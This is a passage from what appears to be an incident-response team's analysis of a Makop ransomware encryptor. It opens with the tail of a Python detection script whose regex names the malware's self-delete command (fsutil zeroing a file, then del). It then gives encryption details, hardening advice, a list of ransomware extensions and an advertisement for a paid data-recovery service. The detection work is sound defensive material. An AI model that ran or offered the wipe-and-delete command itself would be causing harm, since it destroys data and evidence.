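        r'fsutil\s+file\s+setZeroData\s+offset=0\s+length=\d+\s+"(?P<target>[^"]+)"'
        r'\s*&\s*del\s+/q\s+/f\s+"(?P=target)"', re.I)),
]


def match_cmdline(cmdline: str) -> list:
    """Names of every rule the command line triggers (a line can hit more than one)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events=SAMPLE_EVENTS) -> list:
    """(pid, rule) pairs for every matching event, in event order."""
    return [(ev["pid"], name) for ev in events for name in match_cmdline(ev["cmdline"])]


if __name__ == "__main__":
    for pid, rule in scan():
        print(f"pid {pid}: {rule}")
```

The self-delete rule deliberately requires the same quoted path in the fsutil and del arguments rather than matching on ping or fsutil alone, which keeps it quiet on administrative use of either tool.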

5. Analysis summary

  This analysis covers the attack techniques and encryption characteristics of the latest GUI encryptor of the Makop ransomware family. The sample combines AES and RSA: files are encrypted with AES, a unique victim identifier is generated, and the extension .mkp is appended to each file. AES encrypts file content quickly, while RSA encrypts the AES keys, so decryption requires the operators' RSA private key.

6. Security recommendations

1. Risk mitigation measures

  Asset inventory and inspection targets: inspect internal and external assets in phases, according to the actual situation.

  Delivery methods: research interviews, on-site survey, tool-based scanning.

  Key service content: review of the traffic threat-monitoring system, internet exposure scanning, technical hardening, review of centralised management (privileged) systems.

2. Security device tuning

Objective

  By reviewing and analysing the current security posture, identify gaps in security policy and, guided by principles such as targeted defence, least privilege and attack-surface reduction, improve and tune device configuration policies: on one hand, reduce the frequency of ineffective or low-value rules; on the other, add missing or overlooked rules, so that the protective capability of the security devices is maximised.

Main target devices

  Network security devices, host protection software, log auditing and analysis devices, security monitoring and intrusion detection devices.

3. Organisation-wide security awareness

Objective:

  Raise all-round security capability through awareness campaigns and training.

Format:

  Training and awareness sessions.

Offline training schedule

  If offline group training cannot be organised, consider two alternatives:

    1. distribute security-awareness training materials top-down for self-study;

    2. organise online meetings for the relevant staff (online training mode).

Online learning platform

  The following are common ransomware extensions the solar security team has handled recently: .360, .halo, .phobos, .Lockfiles, .stesoj, .src, .svh, .Elbie, .Wormhole, .live, .rmallox, .mallox, .hmallox, .jopanaxye, .2700, .elbie, .mkp, .dura, .halo, .DevicData, .faust, ..locky, .cryptolocker, .cerber, .zepto, .wannacry, .cryptowall, .teslacrypt, .gandcrab, .dharma, .phobos, .lockergoga, .coot, .lockbit, .nemty, .contipa, .djvu, .marlboro, .stop, .etols, .makop, .mado, .skymap, .aleta, .btix, .varasto, .qewe, .mylob, .coharos, .kodc, .tro, .mbed, .wannaren, .babyk, .lockfiles, .locked, .DevicData-P-XXXXXXXX, .lockbit3.0, .blackbit, among others.

  Ransomware is a mature attack method: many families have built a complete commercial ecosystem and spawned numerous affiliate groups, so the malware has gone through many versions. Each family favours different techniques: TellYouThePass commonly exploits system vulnerabilities; Phobos gains access through RDP brute force; Mallox targets databases and uses brute force. The range of techniques is wide and hard to guard against.

  The best prevention is regular baseline hardening, patching and data backup for your own business, together with stronger security awareness among staff. For the latest developments on ransomware, or if you need help, follow the "solar专业应急响应团队" (solar professional incident response team).

7. About the team

  The team is committed to independent R&D and innovation, increasing its investment in an attack-defence exercise platform, a cyber-security competition platform and a cyber-security learning platform; it currently holds more than a dozen patents and intellectual-property rights. It has also obtained ISO9001 (quality management), ISO14000 (environmental management), ISO45001 (occupational health and safety) and ITSS (IT service operation and maintenance, level 4) certifications, forming a qualification system appropriate to the cyber-security industry.

8. Our data recovery service process

  Drawing on many years of data recovery experience and continuous optimisation of customer service, we have built an integrated professional service process: "free pre-sales + assurance + professional recovery + security defence".

① Free consultation / data diagnosis

  Professional pre-sales technical consultants offer free online consultation, so you can obtain the correct handling steps immediately after data has been encrypted, prevent the ransomware from spreading further across the intranet or executing a second time, and avoid mistakes that would make the data unrecoverable.

  The pre-sales consultant gathers information about the infected machines, compares it against similar cases in the team's recovery case library, and gives an initial assessment of how the data was encrypted or damaged.

② Assessment and quotation / recovery plan

  After receiving the initial assessment, if you agree to a more in-depth recovery diagnosis, we immediately assign malware analysis and data recovery engineers to reverse-engineer the sample and assess recoverability.

  Based on the results, the data recovery engineer prepares a recovery plan (price / recovery rate / timeline) and answers your questions about it.

③ Order confirmation / contract signing

  Once you understand the recovery plan, you can choose the following ordering method:

  Signing a corporate contract: a data recovery contract tailored to the analysis of the encrypted data, specifying the recovery scope, recovery rate, timeline and the rights and responsibilities of both parties. After signing, professional recovery work begins; after recovery the data is verified, and once verification succeeds the transaction is complete.

④ Professional data recovery work

  A professional data recovery engineering team provides end-to-end service, informs the customer of precautions and measures during recovery, and, depending on the customer's needs and the state of the data, can recover on-site or remotely.

  During recovery the team reports progress at every stage (data scan → data inspection → data confirmation → customised recovery tool → recovery execution → integrity confirmation).

⑤ Data acceptance / security defence plan

  After recovery, a data analysis engineer performs a second check of completeness to fully protect the customer's interests, after which the customer is notified to verify the data.

  After the customer has verified the data, we provide guidance on follow-up precautions and protective measures, and can offer professional enterprise security architecture and security consulting services to resist further ransomware intrusions.

                      Our solemn promise:

                     No recovery, no fee

                     One-to-one service throughout

                     Service 365 days a year

                     Free security plan

                     24h service hotline:

                     18894665383

                     17864099776

                     1829917331